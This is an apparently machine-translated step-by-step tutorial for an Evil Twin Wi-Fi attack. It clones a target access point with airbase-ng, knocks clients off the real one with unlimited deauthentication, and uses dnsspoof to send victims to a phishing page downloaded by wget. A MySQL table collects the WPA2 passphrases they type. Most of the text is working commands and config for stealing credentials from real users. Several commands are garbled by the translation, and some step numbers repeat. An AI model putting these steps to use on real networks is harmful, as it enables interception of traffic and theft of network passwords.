Nowadays, we see a lot more users being attacked, especially in public places where there is free Wi-Fi.
There may be an open wireless network or weak encryption. But before we get started, you will probably need the right equipment to follow us on our Evil Twin Attack show.
Materials we will need
- Windows 10 (Basic Engine) - With Ethernet connectivity
- Kali Linux (VM Engine) - With NAT enabled
- USB Wireless Adapter TP-LINK - 150 MBPS
- VMWare Workstation
- Kali Linux
- Airmon-ng, Airodump-ng, Airbase-ng and Aireplay-ng
- Apache and MySQL
You must execute the command apt-get update which updates the list of available packages and their versions, but does not install or upgrade any packages on its own.
The apt-get upgrade actually installs newer versions of the packages you already have.
Step 1 - Install the dnsmasq package directly by typing “apt-get install dnsmasq -y".
Dnsmasq provides network infrastructure for small networks: DNS, DHCP and network startup. It is designed to be lightweight and easy to use, suitable for limited resources, routers and firewalls.
It has also been widely used to connect to smartphones and portable hotspots and to support virtual networking on machines. Supported platforms include Linux (with glibc and uclibc), Android, * BSD and Mac OS X. Dnsmasq is included in most Linux distributions and FreeBSD, OpenBSD and NetBSD systems.
If the dnsmasq package is already installed on your machine, then you can skip this step.
Step 2 - Create one configuration file for dnsmasq with the help of the gedit editor (Our favorite graphic editor) and add the following code to it as shown below:
Mandate: sudo gedit /root/Desktop/dnsmasq.conf
interface =at0dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=18.104.22.168 log-queries log-dhcp listen-address=127.0.0.1
Step 3 - Before enabling monitoring, make sure that airmon-ng and NetworkManager do not collide with each other, otherwise you will have to disable the network administrator or repeat the whole process from the beginning.
Open the network administrator configuration file and enter the MAC address of the device that you want the network administrator to stop managing:
Mandate: gedit /etc/NetworkManager/NetworkManager.conf
Now add the following to the end of the file:
[keyfile] unmanaged-devices: mac = AA: BB: CC: DD: EE: FF, A2: B2: C2: D2: E2: F2
NetworkManager.conf is a configuration file for NetworkManager. Used to create various functions of NetworkManager. The location of the file can be changed through its use argument " –Config = ”For NetworkManager.
Step 4 - Connect the wireless USB adapter and confirm it with the command iwconfig.
Here you can see a new interface called wlan0 (It may be different for you).
In this case, we use the adapter USB TP-LINK, but you can use any wireless adapter you want, such as Alfa card, D-Link, Netgear etc.
With the command "ifconfig wlan0 up" upgrades the your wireless interface.
Step 5 - Put your card in monitoring mode by typing “airmon-ng start wlan0"
A new interface will be created (wlan0mon in our case), which is the name of the interface that you should use in other applications.
Step 6 - Now it's time to start monitoring all AIR packages with the following command:
Mandate: airodump-ng wlan0mon
The Airodump-ng is used to bind raw 802.11 packages and is particularly suitable for collecting WEP IVs (Initialization Vector) for use with aircrack-ng.
The information we need from the above command output is:
- BSSID target - 84:10:0D:9E:A1:CD
- Destination channel - 7
- ESSID Objective - XXX
Where, the BSSID is the MAC address of the access point and ESSID is the name of the wireless network called the SSID, which may be empty if the SSID is in stealth mode.
Step 7 - If we did everything right, we could clone his AP and get him to connect with our evil twin. When it does, we will be able to see all of its traffic as well as possibly import our own packages / messages / code into its computer.
To create a fake AP with airbase-ng, type the following command in a new terminal:
Mandate: airbase-ng -e “xxx” -c 7 wlan0mon
Airbase-ng is a multi-purpose tool that targets the client attack as opposed to the Access Point (AP) itself.
A new interface will be created interface at0, which acts as a "wired side" in the AP. To use the AP, this new interface must appear with ifconfig and it needs to get an IP.
The assigned MAC is automatically configured in the BSSID [by default the wireless MAC interface].
Once an IP is assigned and the client uses a static IP from the same subnet, there is an Ethernet connection that operates between the AP and the client. Any daemon can be assigned to this interface, for example a dhcp and dns server.
Step 8 - In order for the IP address to be assigned to at0, we must first assign an IP range to itself.
Mandate: ifconfig at 10.0.0.1 up
We will now use the default interface of the eth0 network to route all traffic from the client through it. In other words, allowing the victim access to the network and allowing ourselves (attackers) to collect this traffic.
For this we will use the iptables utility to set a firewall rule to route all traffic through at0 exclusively.
Mandate: iptables –flush
Mandate: iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
Mandate: iptables –append FORWARD –in-interface at0 -j ACCEPT
By default, all modern Linux distributions will disable IP forwarding. This is a good idea, as most will not need IP Forwarding, but if we are setting up a Linux router / gateway or maybe a VPN server (pptp or ipsec) or just a dial-in server, then data forwarding should be enabled .
If enter the "1" in the file ip_forward, the system will activate the rules set in the IPtables and start the traffic promotion (if any).
Mandate: echo 1> / proc / sys / net / ipv4 / ip_forward
Step 9 - The Evil Twin attack is now ready and the rules are enabled, we will now start the dhcp server to allow the fake AP to assign an IP address to clients.
Start the DHCPD listener using the dnsmasq tool by typing the following command:
Mandate: dnsmasq -C /root/Desktop/dnsmasq.conf -d
If it shows some kind of error like "dnsmasq: failed to create listening socket for port 53: Address already in use" as shown below:
you must find the process ID number and kill all processes associated with that ID.
Mandate: netstat -anlp | grep -w LISTEN
Mandate: sudo ps -f -p 1975
Mandate: sudo kill 1975
After you kill the process, repeat the same command and it should work
Step 10 - The next step is to start the Apache and MySQL services by typing the following commands:
Mandate: /etc/init.d/apache2 start
Mandate: /etc/init.d/mysql start
Step 11 - We have the Evil Twin attack vector and it works perfectly. Now we need to set up our fake website so that the victim sees the page while browsing and enters the access phrase he uses for the access point.
To do this, download this zip file using the wget command in the / var / www / html directory.
Mandate: cd / var / www / html
Mandate: wget https://static.iguru.gr/files/2021/03/iguru.zip
Step 12 - Now unzip the above received iguru.zip file by typing:
Mandate: unzip iguru.zip
The above command will extract the contents of the file iguru.zip and copy them to the Apache html directory so that when the victim opens the browser, they will be automatically redirected to the default web page index.html.
Step 13 - Now to save the credentials that the victim entered in the html page, we need an SQL database.
You will see a file dbconnect.php for this, but to be valid you need a database that has already been created so that dbconnect.php to reflect changes in DB.
Open the terminal and enter: mysql -u root -p
Step 14 - Create a new user fakeap and the password fakeap by typing the following command:
Mandate: create user fakeap @ localhost identified by 'fakeap';
Step 15 - Now create a new database with the name rogue_AP by typing:
Mandate: create database rogue_AP;
And to use this type of database “use rogue_AP;"
Step 16 - The next step is to create a table with a name wpa_keys where all passwords will be entered by the user.
Mandate: create table wpa_keys (password1 varchar (32), password2 varchar (32));
Step 17 - Then Assign all permissions to the fakeap user.
Mandate: grant all privileges on rogue_AP. * to 'fakeap' @ 'localhost';
Step 18 - Exit MySQL and connect to the fakeap user by typing:
Mandate: mysql -u fakeap -p
Here is the password as well falseap
Step 19 - Select the rogue_AP database by typing:
Mandate: use rogue_AP;
And enter a virtual entry in the wpa_keys table for testing only:
Mandate: insert into wpa_keys (password1, password2) values (“testpass”, “testpass”);
And to see the contents of the wpa_keys table, the command is:
Mandate: select * from wpa_keys;
Note that both values are the same here, this means that Password and code confirmation must be the same.
Our attack is now ready, just wait for the client to connect and see the credentials coming.
In some cases your client may already be connected to the original AP. You must disconnect the client as we did in previous drivers, using the aireplay-ng utility.
Step 20 - To disable active clients, the command is:
Mandate: aireplay-ng –deauth 0 -a wlan0mon
–Deauth 0 means unlimited deauthentication requests, but you can also restrict the request by entering natural numbers.
Once a client connects to your AP, you will see an activity in its window terminal of basis as follows:
Step 21 - Now to simulate the client side, we connected fakeAP (I'm sure) on another Windows laptop and using a Firefox Web browser to show the attack.
The victim can now access the Internet. You can do 2 things at this stage:
- Sniff the activity of clients
- Redirect all traffic to the fake AP page. This is what we want to do.
To redirect the client to your fake page, you need to run the dnsspoof utility that is already preinstalled on every Kali Linux Machine, with an at0 interface created by the airbase-ng command:
Mandate: dnsspoof -i at0
DNS spoofing, also referred to as DNS cache poisoning, is a form of electronic intrusion in which corrupted system data is entered into the DNS cache cache, causing the server to return an incorrect result record, e.g. IP address. This results in traffic being diverted to the intruder (or any other computer).
Step 12 - Now go back to the victim's machine and access google.com and you will see that the google.com website displays your fake web host on the Kali Linux machine which tells the victim to enter the download password and hardware upgrade.
Here we enter the “I'm sure@123”As the password we believe to be the AP password.
Once the victim presses "ENTER", you will see the following screen with a page load like this:
Now we return to the side of the attacker. You must check the MySQL database for the stored passwords.
Just type the command previously used in the MySQL terminal window and see if there is a new update or not.
You have successfully collected the WPA2 passphrase, directly from the victim, in plain text.